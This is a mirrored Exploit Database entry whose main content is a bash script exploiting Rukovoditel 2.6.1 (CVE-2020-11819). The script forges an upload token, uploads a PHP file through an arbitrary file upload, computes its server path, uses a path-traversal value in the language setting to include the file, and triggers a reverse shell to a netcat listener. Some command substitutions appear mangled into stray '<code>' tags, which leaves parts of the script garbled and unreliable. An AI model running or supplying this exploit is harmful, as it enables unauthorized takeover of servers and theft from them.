Rukovoditel 2.6.1 – RCE (1)

• Exploit Database
• 103 阅读

• 作者： coiffeur
  日期： 2020-12-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49238/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79

  # Exploit Title: Rukovoditel 2.6.1 - RCE # Date: 2020-06-11 # Exploit Author: coiffeur # Write Up: https://therealcoiffeur.github.io/c1010 # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: v2.6.1 # CVE: CVE-2020-11819   set -e   function usage () { echo "NAME: Rukovoditel v2.6.1, RCE" echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>" echo "DESCRIPTION:" echo "Upload file test.php on the remote server and trigger the file using a LFI" echo "AUTHOR: coiffeur" exit }   if [ "$#" -ne 2 ]; then usage fi   BASE_URL=$1 SID=$2 echo "Setting target: $BASE_URL" echo "Setting sid: $SID"   echo ""   echo "Extracting \$app_user[&apos;id&apos;]:" APP_USER_ID=<code>curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d &apos;=&apos; -f 3 | cut -d "&apos;" -f 1 echo "=>\$app_user[&apos;id&apos;]: $APP_USER_ID"   echo "Setting arbitrary \$_POST[&apos;timestamp&apos;]:" TIMESTAMP=1337 echo "=>\$_POST[&apos;timestamp&apos;]: 1337"   echo "Calculating \$verifyToken:" VERIFY_TOKEN=<code>echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d &apos; &apos; -f 1= echo "=>\$verifyToken: $VERIFY_TOKEN" echo ""   echo "[*] Trying to upload test.php ... (Arbitrary File Upload)" curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F &apos;Filedata=@test.php&apos;   echo ""   echo "[*] Trying to recover time() output:" TIME=$(date -d "<code>curl -si "$BASE_URL" | grep "Date:" | sed &apos;s/Date: //&apos;</code>"= +%s) echo "=>timestamp: $TIME"   echo "[*] Trying to recover the generated filename:"=20 FILENAME=<code> echo -n $TIME"_test.php" | sha1sum | cut -d &apos; &apos; -f 1 echo "=>filename: $FILENAME"   echo "[*] Trying to reconstructing full path:" DATE=<code>date +"%Y/%m/%d" FULL_PATH=<code>echo -n "uploads/attachments/$DATE/$FILENAME" echo "=>full path: $FULL_PATH"   echo ""   echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"   echo ""   echo "[*] Trying to update language settings... (Local File Inclusion)" LANGUAGE="../../$FULL_PATH" curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"   echo "[*] Triggering reverse shell ..." curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID="   echo "[*] Restoring default language settings" curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php" echo "> Done"